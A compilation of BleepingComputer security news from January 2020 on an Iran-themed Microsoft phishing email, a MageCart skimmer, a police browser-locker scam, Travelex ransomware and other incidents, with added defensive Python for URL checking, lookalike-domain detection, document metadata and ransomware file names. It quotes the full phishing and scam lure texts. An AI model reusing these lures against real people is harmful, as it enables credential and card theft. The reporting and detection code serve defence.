With the rising escalations between the United States and Iran, the U.S. government has been issuing warnings about possible cyberattacks by Iran and potential attacks on critical U.S. infrastructure.

To take advantage of this increased tension, an attacker has created a phishing scam that pretends to be from 'Microsoft MSA' and has an email subject of 'Email users hit by Iran cyber attack' warning that Microsoft's servers were hit by a cyberattack from Iran.

The phishing email goes on to say that in response to this attack, Microsoft was forced to protect its users by locking their email and data on Microsoft's servers. To regain full access to this locked data, the phishing email says, the recipient must log in again.

Phishing email about Iranian cyberattack on Microsoft Servers
According to Michael Gillett, who received this phishing scam and shared it with BleepingComputer, it was able to bypass Outlook's spam filters and arrive in the service's inbox.

The full text of this phishing email, which needed a run through a spell checker, can be read below.

Cyber Attack

Microsoft servers have been hit today with an Cyber Attack from Iran Government

For your seifty and security we had to take extra mesures to protect your account and your personal data.

Some emails and files might still be locked on our servers, in order to get full access to your emails and files you have to signin again.

If you still have problems receiveing emails please be patient, our support team is working on this issue and we will fix this as soon as possible.

Restore Data
If a recipient clicks the 'Restore Data' button, they are redirected to a phishing landing page that pretends to be a Microsoft login form. As you can see from the URL, this is not a legitimate Microsoft site.

Microsoft Login Phishing Page
If a user enters their login credentials, they will be stolen by the attackers and used in further attacks, which could include targeted phishing scams, credential stuffing attacks, or even data theft.

As always, when you receive a strange email asking you to log in to perform some task, be suspicious and contact your network or mail administrator.

Furthermore, users should always examine the URLs of any landing pages that contain Microsoft login forms and remember that legitimate login forms will be on the microsoft.com, live.com, and outlook.com domains.
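The domain check described above can be automated for mail-gateway or SOC triage. The following is an added example written for this page, not code from BleepingComputer or Microsoft; the allowlist contains only the three domains the article names, the sample URLs are constructed, and the check is done on the parsed hostname so that lookalikes embedding "microsoft.com" in a path, a subdomain of another domain, or a userinfo field are rejected.

```python
"""Check whether a login-page URL belongs to a Microsoft-operated domain.

Added example (not from the BleepingComputer article). The allowlist below is
taken from the article's own advice (microsoft.com, live.com, outlook.com);
everything else, including the sample URLs, is constructed for illustration.
"""
from urllib.parse import urlsplit

# Registrable domains the article names as hosting legitimate Microsoft login forms.
LEGITIMATE_LOGIN_DOMAINS = {"microsoft.com", "live.com", "outlook.com"}


def is_legitimate_login_url(url: str) -> bool:
    """Return True only if the URL uses HTTPS and its host is one of the
    allowlisted domains or a subdomain of one.

    The check is done on the parsed hostname, not with a substring search, so
    lookalikes such as "login.microsoft.com.example.net" or
    "https://evil.example/microsoft.com/login" are rejected.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() != "https":
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    # Embedded credentials (https://microsoft.com@evil.example/) are a classic
    # trick; urlsplit puts the real host in .hostname, but refuse them outright.
    if parts.username is not None or parts.password is not None:
        return False
    for domain in LEGITIMATE_LOGIN_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return True
    return False


def classify_urls(urls):
    """Map each URL to 'legitimate' or 'suspicious' for a quick triage report."""
    return {u: ("legitimate" if is_legitimate_login_url(u) else "suspicious") for u in urls}


if __name__ == "__main__":
    # Constructed sample URLs; none are from the article.
    samples = [
        "https://login.live.com/login.srf",
        "https://microsoft.com.account-restore.example/login",
        "http://outlook.com/",
        "https://microsoft.com@phish.example/restore",
        "https://evil.example/microsoft.com/login",
    ]
    for url, verdict in classify_urls(samples).items():
        print(f"{verdict:10} {url}")
```

In a real deployment the allowlist would be extended with the other domains Microsoft uses for sign-in (for example microsoftonline.com); the list here is deliberately limited to what the article states.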


Firefox 72 Out With Fingerprinter Blocking, Hidden Notification Prompts
10.1.2020 
Bleepingcomputer  Safety

Mozilla has officially released Firefox 72 for Windows, Mac, and Linux and with it comes hidden browser notification prompts and fingerprinter blocking enabled by default in Enhanced Tracking Protection.

Firefox 71 About Page

With the release of Firefox 72, the other development branches of Firefox have also moved up a version. This brings Firefox Beta to version 73 and the Nightly builds to version 74.

You can download Firefox 72 from the following links:

Firefox 72 for Windows 64-bit
Firefox 72 for Windows 32-bit
Firefox 72 for macOS
Firefox 72 for Linux 64-bit
Firefox 72 for Linux 32-bit
Below are the major changes in Firefox 72, but for those who wish to read the full change log, you can do so here.

Enhanced Tracking Protection blocks fingerprinters by default
Firefox 72's Enhanced Tracking Protection will now block known fingerprinter scripts by default.

Fingerprinters are a tracking method that allows a company to track you based on characteristics of your computer rather than through tracking cookies.

With this release, Enhanced Tracking Protection will automatically block these types of tracking scripts under the Standard setting.

"Firefox 72 protects users against fingerprinting by blocking all third-party requests to companies that are known to participate in fingerprinting. This prevents those parties from being able to inspect properties of a user’s device using JavaScript. It also prevents them from receiving information that is revealed through network requests, such as the user’s IP address or the user agent header," Firefox announced in a blog post.

Enhanced Tracking Protection
Firefox now hides browser notification prompts
One of the more annoying experiences when browsing the web is being shown browser notification subscription prompts that won't go away until you acknowledge them.

Example browser notification prompt
With Firefox 72, Mozilla will no longer show these notification subscription prompts and will instead display a small chat bubble in the address bar to indicate that the site is offering browser notifications.

If a user is interested in subscribing they can click on the chat bubble to see the notification dialog as demonstrated below.

Firefox 72 hiding browser notification prompts
Picture-in-Picture now available for Mac and Linux
With the release of Firefox 71, Mozilla added support for the Picture-in-Picture API, but it was only available to Windows users at that time.

With Firefox 72, this feature is now also available for Mac and Linux users.

Security Improvements
Mozilla's Security Advisories for Firefox page states that this release fixes 11 security vulnerabilities with 5 being classified as 'High', 5 classified as 'Medium', and one as 'Low'.

Of the five 'High' vulnerabilities, four indicate that they could potentially be used by attackers to create specially crafted pages that lead to arbitrary code execution.

Other notable changes or additions
Other notable changes in Firefox 72 include:

Support for blocking images from individual domains has been removed from Firefox, because of low usage and poor user experience.
Enterprise: Experimental support for using client certificates from the OS certificate store can be enabled by setting the preference security.osclientcerts.autoload to true (Windows only).
Developer changes:
Firefox 72 includes the following improvements for developers:

Debugger Watchpoints let developers observe object property reads and writes, making it easier to track data flow through an application.

Firefox now supports simulation of meta viewport in Responsive Design Mode.


MageCart Attackers Steal Card Info from Focus Camera Shoppers
10.1.2020 
Bleepingcomputer  CyberCrime

The website of popular photography and imaging retailer Focus Camera got hacked late last year by MageCart attackers to inject malicious code that stole customer payment card details.

In true MageCart fashion, the script loaded at checkout to capture billing information and send it to the attacker's server.

Posing as a legitimate ZenDesk domain
To hide the malicious traffic, the attackers registered "zdsassets.com," a domain that resembles ZenDesk's legitimate "zdassets.com."

The MageCart domain was registered on November 11, 2019, with a hosting provider in the Netherlands and the thieving script was discovered in late December by Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.

When analyzing the breach, Hahad found that the attacker modified a JavaScript file to inject an obfuscated payload. The routine is encoded using base64.

Once decoded, the researcher was able to see the routines executed by the skimming script. The details it stole included email address, customer name, billing and shipping addresses, phone number, and card details (number, expiration date, CVV code).

According to DNS telemetry data seen by Hahad, the command and control domain receiving information belonging to Focus Camera customers was resolved 905 times since its creation. This could be indicative of the number of victims.
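Two of the indicators described above, a base64-encoded blob injected into an existing JavaScript file and a domain that is one character away from a trusted vendor's, can be checked mechanically during a review of a checkout page's scripts. The block below is an added example for this page, not code from Juniper Threat Labs or the article: it decodes long base64 string literals, pulls any domains out of the decoded text, and flags those that are not on a trusted list, reporting which trusted domain they resemble. The zdassets.com / zdsassets.com pair is from the article; the JavaScript sample and the trusted-domain list (including focuscamera.example) are constructed.

```python
"""Triage helper for a checkout page's JavaScript: decode base64 string
literals and compare any domains they reference against trusted vendor
domains, flagging near-misses.

Added example, not code from Juniper Threat Labs or the article. The domain
pair zdassets.com / zdsassets.com is from the article; the JavaScript sample
and the trusted-domain list are constructed.
"""
import base64
import binascii
import re
from difflib import SequenceMatcher

# Domains the shop legitimately loads scripts from (constructed allowlist).
TRUSTED_DOMAINS = {"zdassets.com", "focuscamera.example", "googleapis.com"}

# A quoted run of 40+ base64 characters; short literals are ignored as noise.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
DOMAIN = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def decode_base64_literals(js_source: str):
    """Return decoded text for every long base64 string literal in the source."""
    decoded = []
    for match in B64_LITERAL.finditer(js_source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue
        try:
            decoded.append(raw.decode("utf-8"))
        except UnicodeDecodeError:
            continue  # binary payload; not handled by this text-only helper
    return decoded


def registrable(host: str) -> str:
    """Crude last-two-labels approximation of the registrable domain."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:])


def lookalike_of(domain: str, trusted=TRUSTED_DOMAINS, threshold=0.85):
    """Return the trusted domain this one closely resembles, or None.

    Exact matches return None too: they are trusted, not lookalikes.
    """
    if domain in trusted:
        return None
    best, best_ratio = None, 0.0
    for t in trusted:
        ratio = SequenceMatcher(None, domain, t).ratio()
        if ratio > best_ratio:
            best, best_ratio = t, ratio
    return best if best_ratio >= threshold else None


def audit_checkout_script(js_source: str):
    """Return (domain, reason) findings for every domain referenced from a
    decoded base64 blob that is not on the trusted list."""
    findings = []
    for text in decode_base64_literals(js_source):
        for host in DOMAIN.findall(text):
            domain = registrable(host)
            if domain in TRUSTED_DOMAINS:
                continue
            similar = lookalike_of(domain)
            reason = f"lookalike of {similar}" if similar else "untrusted domain in encoded string"
            findings.append((domain, reason))
    return findings


# Constructed sample: a checkout script with a plain literal for the real
# vendor and one encoded literal that references the lookalike domain.
SAMPLE_JS = (
    'var cdn = "https://static.zdassets.com/ekr/snippet.js";\n'
    'var cfg = "' + base64.b64encode(b'{"endpoint":"https://zdsassets.com/collect"}').decode() + '";\n'
)

if __name__ == "__main__":
    for domain, reason in audit_checkout_script(SAMPLE_JS):
        print(f"{domain}: {reason}")
```

Running this against the constructed sample reports zdsassets.com as a lookalike of zdassets.com. The similarity threshold and the two-label approximation of the registrable domain are deliberately simple; a production check would use the public suffix list and a curated vendor allowlist.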

"It is possible the same C&C domain is being used across multiple compromised shopping sites and campaigns - At this time, we don’t have any telemetry to prove it one way or the other" - Mounir Hahad

In a blog post today, Hahad says that the MageCart script acted when the customer made a purchase as a guest, without having registered.

After determining that the Focus Camera website had been compromised, Juniper Threat Labs tried to contact the site owners. Different timezones and weekends delayed a response from the retailer.

A few days later, the researcher was able to talk to the domain admins and share the findings with them. By the end of the day, the malicious code was removed from the site.


MP Says Austria Unprepared After Cyberattack on Foreign Ministry
10.1.2020 
Bleepingcomputer  BigBrothers

The Austrian State Department's IT systems were under a 'serious attack' suspected to be carried out by a state-backed threat group according to a joint statement from the Foreign Ministry (BMEIA) and the Ministry of the Interior (BMI).

"A coordination committee has been set up on the basis of the Network and Information System Security Act, and all relevant federal agencies are already active," the press release says. "The problem was recognized very quickly and countermeasures were taken immediately."

The attack was disclosed late on Saturday evening and, according to a statement from Foreign Minister Peter Guschelbauer quoted by Austria's national public service broadcaster ORF (Österreichischer Rundfunk), it was still active on Sunday.

Austria ill-prepared for such incidents
"The recent and ongoing hacker attack on the Foreign Ministry clearly shows how important cyber defense is and how little Austria is apparently prepared to ward off cyberattacks," Austrian Parliament lower house member Robert Laimer said in a statement.

Laimer, the SPÖ's (Social Democratic Party of Austria) regional defense spokesman, also added that Austria's Armed Forces should receive funding for cybersecurity training courses.

This would allow them to intervene and help defend the country's critical infrastructure against future cyberattacks attempting to cause disruption.

"The fact that the Greens at their federal congress do not see the priorities for the Austrian Armed Forces in the national defense and that airspace security is secondary means that there are worries for the future of the Bundeswehr," said Laimer.

The Austrian Armed Forces urgently need the necessary basic funding to master the protection of critical infrastructure and cyber attacks. - Robert Laimer

Suspected nation-backed cyberattack
"Due to the severity and the nature of the attack, it cannot be ruled out that it is a targeted attack by a state actor," says the joint BMEIA and BMI statement. "The state protection mechanisms provided for this are active at all levels."

This wouldn't be the first time a European country was targeted by a state-sponsored actor: the Russian hacking group tracked as APT28 managed to infiltrate the networks of the German Foreign Ministry, Defense Ministry, Chancellery, and Federal Court of Auditors, according to a report from March 2018.

Germany's Federal Ministry of the Interior confirmed the hack, with ministry officials saying that the intrusion was initially detected in December 2017.

German officials also said at the time that an investigation was ongoing to determine which systems the hackers had infiltrated.

Additionally, based on the evidence already gathered up to that point, the APT28 group had access to the German government network for almost an entire year.

In the past, some European countries have been targeted for similar attacks. Despite all the intensive security measures, there is no 100% protection against cyber attacks. - BMEIA and BMI joint statement

Russian hackers targeting government bodies
APT28 is a Russian cyber-espionage unit also tracked as STRONTIUM, Sofacy, and Fancy Bear, an APT group active since at least January 2007 and previously connected to cyber-espionage campaigns targeting governments and security organizations from all over the world.

The group was behind campaigns such as the Democratic National Committee hack ahead of the 2016 US Presidential Election and attacks on Ministries of Foreign Affairs of the USA and Romania.

A six-month-long cyberattack against the German Parliament that started in 2014 was also attributed to APT28 by Bundestag's director, as were spearphishing attacks targeting NATO and the White House in August 2015 and members of the Bundestag in August 2016, and attempts to hack into the Dutch Ministry of General Affairs in February 2017.

Microsoft said in July 2019 that it alerted around 10,000 of its customers during the last year of either being targeted or compromised by nation-state sponsored hacking groups.

The numbers presented by Redmond reveal the dependence of nation-states on cyber attacks as the means for collection and extracting intelligence, influencing geopolitics, and achieving various other objectives.


Fake Windows 10 Desktop Used in New Police Browser Lock Scam
10.1.2020 
Bleepingcomputer  OS

Scammers have taken an old browser scam and invigorated it using a clever and new tactic that takes advantage of your web browser's full-screen mode to show a fake Windows 10 desktop stating your computer is locked.

This type of scam is called a police browser locker, which pretends to be law enforcement locking your browser due to illegal activity. These scams then state that if you pay a fine via credit card, your computer will be unlocked so you can use it again.

These types of scams are normally easy to detect as they utilize fake and suspicious URLs and allow you to use other apps on your computer even if the browser is locked.

Overlaying a full-screen Windows 10 Desktop image
To make it harder for users to identify these types of scams, attackers are tricking web users into visiting fake sites that display a full-screen image of a Windows 10 desktop with the Chrome browser open.

These fake Windows 10 desktop images will fill up the entire screen and pretend to display the web site for the country's local police force. As the attackers are just displaying an image, they can also display the legitimate government URL to make it more convincing.

These fake web sites state that the police locked the user's computer for conducting illegal activities such as viewing and disseminating pornographic images of children, zoophilia, and rape. Victims are then prompted to enter their credit card details to pay a fine of approximately $800.

Fake Windows 10 Desktop shown by French browser locker
When displaying these screens, the scam will show different law enforcement web sites and languages depending on the URL visited or possibly what country you're from.

Malwarebytes, which first posted about this new technique, saw this scam targeting web users from Qatar, UAE, Oman, Kuwait, and France.

For example, below is some of the text shown in the UAE variant of this scam.

"Your browser has been locked due to viewing and dissemination of materials forbidden by law of [country], namely pornography with pedophilia, rape and zoophilia.

In order to unlocking you should a [amount] [currency] fine with Visa or MasterCard.

Your browser will be unlocked automatically after the fine payment.

Attention! In case of non-payment of the fine, or your attempts to unlock the device independently, case materials will be transferred to [police_force_name] for the institution of criminal proceedings against you due to commitment a crime."

If you enter your credit card details into this form, the attackers will automatically steal the payment information, which will then be sold online at underground criminal forums or used by the attackers for fraudulent purchases.

This tactic makes the scam more convincing
What makes this new variant of the police browser locker so clever is that when the image is shown by the browser in full-screen mode it overlays the entire screen, including the normal Windows 10 desktop.

This could cause users to think that the fake Windows 10 desktop image is their normal desktop. The difference, though, is that clicking on the Start Menu, closing apps, or starting new ones will not work.

What will be usable is an overlaid credit card form, which could make some users think that law enforcement has locked their computer until a fine is paid.

It is important to know that law enforcement will never lock your browser like this and then demand a fine be paid online.

If you ever see a message on your screen like this, press Alt+Tab to see if you can get back to your normal desktop or press Ctrl+Alt+Delete to open the Task Manager and terminate any browser processes.


InfoTrax Gets Slap on The Wrist After Being Breached 20+ Times
10.1.2020 
Bleepingcomputer  Incindent

The Federal Trade Commission (FTC) finalized a settlement with a Utah-based tech company that got hacked and had the personal info of over a million clients stolen following a series of more than 20 undetected network intrusions.

InfoTrax Systems, a provider of back-end operations systems and online distributor of MLM software for the Direct Sales industry, only detected the security breach after "it was alerted that its servers had reached maximum capacity."

The hacker infiltrated InfoTrax’s servers and websites maintained on behalf of the company's clients over 20 times from May 5, 2014, until March 7, 2016, and maintained access to the servers for more than two years per FTC's press release announcing the settlement proposal.

Hacker fills a server with stolen data
InfoTrax was only able to detect the hacker because the archive of stolen data he collected grew so large that one of the servers' hard disks ran out of space.

On March 2, 2016, the threat actor was able to access the sensitive info of roughly one million consumers according to the FTC complaint.

Specifically, the intruder queried certain databases on InfoTrax’s systems from which the intruder accessed personal information of approximately one million consumers, including: full names; physical addresses; email addresses; telephone numbers; SSNs; distributor user IDs and passwords; and admin IDs and passwords. - FTC

To make things even worse, according to the FTC, the company "stored consumers’ personal information [...] in clear, readable text on InfoTrax’s network."

Subsequently, intruders were able to hack InfoTrax's network again on March 14, 2016, and the network of one of its clients on March 29, 2016; on both occasions malicious code was deployed to successfully collect personal and financial information from thousands of victims.

While the total number of consumers InfoTrax stored information on at the time of the hacks is not known, the FTC says that it stored the personal info of around 11.8 million individuals as of September 2016.

A second chance to get things right
Per the FTC press release containing the proposed settlement published in November 2019, InfoTrax failed to:

• inventory and delete personal information it no longer needed;
• conduct code review of its software and testing of its network;
• detect malicious file uploads;
• adequately segment its network; and
• implement cybersecurity safeguards to detect unusual activity on its network.

"Service providers like InfoTrax don’t get a pass on protecting sensitive data they handle just because their clients are other businesses rather than individual consumers," Director of the FTC’s Bureau of Consumer Protection Andrew Smith said at the time.

"As this case shows, it’s every company’s responsibility to protect customers’ personal information, especially sensitive data like Social Security numbers."

As part of the finalized settlement with the FTC, the company is prohibited from collecting, selling, sharing, or storing any consumer personal information until it addresses the security issues described in the complaint.

The Utah-based technology company is also required to obtain third-party audits of their new information security program every two years to confirm its capability to protect the security, integrity, and confidentiality of the information stored on InfoTrax's servers.

Privacy is a top priority
InfoTrax also published a press release after the FTC's proposed settlement was issued saying that after discovering the intrusion they "took immediate action to secure the data stored on our servers and to shut down any further unauthorized access."

They reached out to "affected clients and voluntarily requested the support of law enforcement agencies, including the Federal Bureau of Investigation (FBI), to determine the nature and scope of the breach."

The company also signed a consent order detailing the security standards it obliges itself to follow, many of which were implemented before the FTC's order.

"We deeply regret that this security incident happened. Information security is critical and integral to our operations, and our clients’ and customers’ security and privacy is our top priority," InfoTrax added.


Nvidia CES Game Ready Driver Adds a Maximum Frame Rate Setting
10.1.2020 
Bleepingcomputer  IT

At CES 2020, Nvidia has released GeForce Game Ready Driver 441.87 and with it comes a few new features, including one that allows you to set a maximum frame rate that will be used by 3D games and applications.

In this release of Nvidia's Game Ready drivers, 'Optimal game settings' have been added for an additional 33 games so that you get the best performance out of your GPU while playing them.

Nvidia has also added a new setting called 'Max Frame Rate' that allows you to cap the frame rate that 3D games and applications are rendered at.

This new feature can be found at NVIDIA Control Panel -> Manage 3D Settings -> Max Frame Rate as shown in the image below.

Set Maximum Frame Rate
Nvidia states that this feature can be used for a variety of reasons including saving power, reducing system latency, and staying in VRR range and has provided the following method to achieve these results:

Saving Power: Enable Max Frame Rate (NVIDIA Control Panel > 3D Settings > Max Frame Rate) and set your power management mode to “Optimal Power”(NVIDIA Control Panel > 3D Settings > Power Management Mode). While in this mode, GPU frequency is reduced and uses less power. For laptop users, Max Frame Rate also works alongside with Battery Boost and Whisper Mode. If either of these modes are enabled at the same time as Max Frame Rate, the NVIDIA Control Panel will cap the framerate to the lowest of the limits.
Reducing System Latency: Enable Max Frame Rate and set your power management mode to “Prefer maximum performance” to reduce latency. While in this mode, the GPU is kept at higher frequencies to process frames as quickly as possible. To maximize latency reduction in GPU bound scenarios where FPS is consistent, set Max Frame Rate to a framerate slightly below the average FPS and turn Low Latency Mode to Ultra.
Staying in VRR Range: Set the Max Frame Rate slightly below the maximum refresh rate of your display to stay within the Variable Refresh Rate range - providing a no-tear, low system latency experience! For the smoothest, no tear experience, set the low latency mode to Ultra and turn VSYNC on.
Other features in version 441.87
In addition to the Max Frame Rate feature, this driver also introduces a few other features:

Variable Rate Super Sampling (VRSS) is a new feature that improves image quality in Virtual Reality games.
Image Sharpening Improvements allow you to toggle GPU scaling independently of whether Image Sharpening is enabled.
Freestyle ‘Splitscreen’ Filter allows gamers to apply filters to only a portion of the screen.
New G-SYNC Compatible Displays
Game Ready for Wolfenstein: Youngblood with Ray Tracing


IT Executive Steals $6 Million, Busted by Word Doc Metadata
10.1.2020 
Bleepingcomputer  CyberCrime

A former corporate executive of a global internet company swindled roughly $6 million between August 2015 and May 2019 using a shell company named Interactive Systems.

48-year old Hicham Kabbaj of Floral Park, New York, pleaded guilty today to one count of wire fraud and faces a maximum sentence of 20 years in prison.

He was arrested on September 4, 2019, at which time he was also charged with an additional count of transacting in criminally derived property, which carries an extra maximum sentence of 10 years.

"As he admitted today, Hicham Kabbaj defrauded the company for which he worked by arranging for payment of fraudulent invoices to a shell company he created," said Manhattan U.S. Attorney Geoffrey S. Berman.

52 invoices worth millions
While the complaint unsealed on September 5, 2019, doesn't name the company he defrauded, a Hicham Kabbaj moved up through the ranks at integrated marketing solutions firm Rakuten Marketing, as found by analyst K. Louise Neufeld and according to his LinkedIn page.

He started as Director of Operations in May 2015 and was employed as a Tech Ops & Engineering SVP between May 2018 and Aug 2019.

Being in charge of the company's data centers allowed him to start his embezzlement scheme by sending himself invoices just four months after being hired, asking for payment for firewall devices, servers, and services that were never delivered.

More exactly, between August 2015 and April 2019, Kabbaj's Interactive Systems shell company submitted roughly 52 invoices to his employer.

From in or about August 2015 through in or about April 2019, Interactive Systems submitted to Company-1 approximately 52 invoices. Four of these invoices were submitted in Word document format, and the metadata for these four invoices identified KABBAJ as the author. Each invoice from Interactive Systems was addressed to KABBAJ.

Besides all invoices being addressed to Kabbaj, the special agent assigned to the investigation also discovered that four invoices were submitted in Word document format, with the metadata identifying Kabbaj as the author.
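The metadata the complaint relied on is stored inside the .docx container, which is a ZIP archive with the document's core properties in docProps/core.xml (dc:creator for the original author, cp:lastModifiedBy for the last editor). The block below is an added example for this page, not part of the DoJ filing or the article: it reads those fields from any .docx, and builds a minimal constructed document in memory, with placeholder author names and dates, so that the reader can run it without a real file.

```python
"""Read the author metadata from a .docx file, the kind of evidence the
complaint describes for the four Word-format invoices.

Added example, not from the DoJ filing or the article. A .docx is a ZIP
archive; the core properties live in docProps/core.xml using Dublin Core
elements (dc:creator for the author, cp:lastModifiedBy for the last editor).
The sample document below is constructed in memory with placeholder values.
"""
import io
import xml.etree.ElementTree as ET
import zipfile

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}


def read_core_properties(docx_bytes: bytes) -> dict:
    """Return author, last editor, and creation/modification timestamps
    from docProps/core.xml. Missing fields are None; a container without
    core properties yields an empty dict."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return {}
        root = ET.fromstring(zf.read("docProps/core.xml"))

    def text(path):
        el = root.find(path, NS)
        return el.text if el is not None else None

    return {
        "creator": text("dc:creator"),
        "last_modified_by": text("cp:lastModifiedBy"),
        "created": text("dcterms:created"),
        "modified": text("dcterms:modified"),
    }


def build_sample_docx(creator: str, last_modified_by: str) -> bytes:
    """Build a minimal .docx in memory (constructed fixture, not a real invoice;
    the timestamps are placeholders)."""
    core_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="{NS['cp']}" xmlns:dc="{NS['dc']}"
    xmlns:dcterms="{NS['dcterms']}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:title>Invoice</dc:title>
  <dc:creator>{creator}</dc:creator>
  <cp:lastModifiedBy>{last_modified_by}</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2000-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-01-01T00:05:00Z</dcterms:modified>
</cp:coreProperties>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # minimal placeholder parts
        zf.writestr("docProps/core.xml", core_xml)
        zf.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


# Constructed sample with placeholder names (no real person is referenced).
SAMPLE_DOCX = build_sample_docx("PLACEHOLDER_AUTHOR", "PLACEHOLDER_EDITOR")

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DOCX
    for key, value in read_core_properties(data).items():
        print(f"{key:17} {value}")
```

Pass a path to a real .docx as the first argument to inspect it; with no argument the script reads the constructed sample. Note that dc:creator is whatever the authoring application wrote and can be edited, so it corroborates other evidence (here, the invoices being addressed to the same person) rather than proving authorship on its own.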

"As part of the scheme, KABBAJ caused Interactive Systems to send invoices to Company-1 claiming that Interactive Systems performed services and purchased firewalls and servers for Company-1," a Department of Justice press release published today says.

"In reality, Interactive Systems did none of that work, and KABBAJ quickly transferred the money that Company-1 paid to Interactive Systems to his own personal bank accounts.

In total, KABBAJ defrauded Company-1 of more than $6 million as a result of the scheme," the DoJ adds.

From in or about December 2016 through in or about July 2019, the only withdrawals from the Interactive Systems account, other than maintenance fees, are transfers to two accounts at Bank-1 held in the name of KABBAJ ("Kabbaj Account-1" and "Kabbaj Account-2"). There are no withdrawals to pay other vendors or individuals for goods or services, such as the purchase of firewall devices or servers.

Besides pleading guilty to one count of wire fraud, for which he is facing a maximum sentence of 20 years in prison, Kabbaj also "agreed to forfeit his homes in Palm Beach Gardens, Florida, and Hewitt, New Jersey, as property traceable to the offense, among other assets, and he has agreed to pay restitution in the amount of $6,051,453."

"Today, Mr. Kabbaj pled guilty to a serious felony because he chose to misuse his position of trust as a corporate executive to steal company funds for his own personal gain," IRS-CI Special Agent in Charge Jonathan D. Larsen added.

"As a result of the dedicated work of IRS-CI special agents, along with our partners at the U.S. Attorney’s Office, Mr. Kabbaj will face the consequences of his crime when he is sentenced by a federal judge."


Sodinokibi Ransomware Hits Travelex, Demands $3 Million
10.1.2020 
Bleepingcomputer  Ransomware

It's been more than six days since a cyber attack took down the services of the international foreign currency exchange company Travelex and BleepingComputer was able to confirm that the company systems were infected with Sodinokibi ransomware.

The attack occurred on December 31 and affected some Travelex services. This prompted the company to take offline all its computer systems, a precaution meant "to protect data and prevent the spread of the virus."

As a result, customers could no longer use the website or the app for transactions or make payments using credit or debit cards at its more than 1,500 stores across the world. Hundreds of customer complaints came pouring in via social media since the outage began.

In replies to customers today, Travelex was unable to provide updates about progress on restoring its services. In the meantime, the company shows a cyber incident notification on the main page of its website and "planned maintenance" on other pages.

All network locked, files stolen
On January 3, ComputerWeekly magazine received inside information that the London-based foreign currency exchange company had fallen victim to a ransomware attack, although the malware family remained unknown.

The same news outlet today reported that the ransomware used in the Travelex attack is Sodinokibi.

BleepingComputer was able to independently confirm that Travelex systems were indeed infected by REvil ransomware. We were told that the extension added to some of the encrypted files was a string of more than five random characters, similar to .u3i7y74. This malware typically adds different extensions to files locked on other computer systems.
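Because this family appends a different random-looking extension on each victim system, a static indicator list does not help; what can be checked is the shape of the file names. The block below is an added example for this page, not code from BleepingComputer or any vendor: it flags files named <name>.<known extension>.<random string> and groups them by the appended string, since many files sharing one unknown extension is the stronger signal of mass encryption. The ".u3i7y74" sample is the article's; the file listing and the known-extension list are constructed.

```python
"""Flag files whose name ends in an appended random-looking extension, the
pattern described for the encrypted Travelex files (e.g. ".u3i7y74").

Added example, not from the article or BleepingComputer. The ".u3i7y74"
sample is the article's; the file listing and the known-extension list are
constructed.
"""
import math
import os
import re
from collections import Counter

# Extensions expected in the directories being checked (constructed list).
KNOWN_EXTENSIONS = {"docx", "xlsx", "pdf", "txt", "jpg", "png", "zip", "csv", "log"}

# <anything>.<original ext>.<appended 5-10 lowercase alphanumerics>
APPENDED_EXT = re.compile(r"^.+\.(?P<orig>[A-Za-z0-9]{1,5})\.(?P<added>[a-z0-9]{5,10})$")


def shannon_entropy(s: str) -> float:
    """Bits per character; short random strings score near log2(len)."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_random(ext: str) -> bool:
    """True for mixed letter/digit strings with high entropy that are not
    themselves a known extension."""
    has_letter = any(c.isalpha() for c in ext)
    has_digit = any(c.isdigit() for c in ext)
    return has_letter and has_digit and shannon_entropy(ext) >= 2.0 and ext not in KNOWN_EXTENSIONS


def suspicious_extension(filename: str):
    """Return the appended extension if the file name looks like
    <name>.<known ext>.<random>, else None."""
    m = APPENDED_EXT.match(os.path.basename(filename))
    if not m:
        return None
    if m.group("orig").lower() not in KNOWN_EXTENSIONS:
        return None
    added = m.group("added")
    return added if looks_random(added) else None


def scan_names(names):
    """Group suspicious files by appended extension."""
    by_ext = {}
    for n in names:
        ext = suspicious_extension(n)
        if ext:
            by_ext.setdefault(ext, []).append(n)
    return by_ext


def scan_directory(root):
    """Walk a directory tree and apply scan_names to every file path."""
    paths = [os.path.join(d, f) for d, _, files in os.walk(root) for f in files]
    return scan_names(paths)


# Constructed listing: three files carry the same appended extension.
SAMPLE_LISTING = [
    "finance/q4_report.xlsx.u3i7y74",
    "finance/budget.docx.u3i7y74",
    "hr/policy.pdf.u3i7y74",
    "hr/photo.jpg",
    "it/server.log",
    "it/archive.tar.gz",
    "it/backup.zip.backup",
]

if __name__ == "__main__":
    for ext, files in scan_names(SAMPLE_LISTING).items():
        print(f".{ext}: {len(files)} files, e.g. {files[0]}")
```

The heuristic is meant for a quick sweep of a file share or backup target during an incident, not as a primary control: legitimate tools also append extensions (the ".backup" case in the listing is deliberately left unflagged), and the thresholds should be tuned to the naming conventions of the environment.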

In addition to the ransom note, the Sodinokibi crew told BleepingComputer that they encrypted the entire Travelex network and copied more than 5GB of personal data, which includes dates of birth, social security numbers, card information and other details.

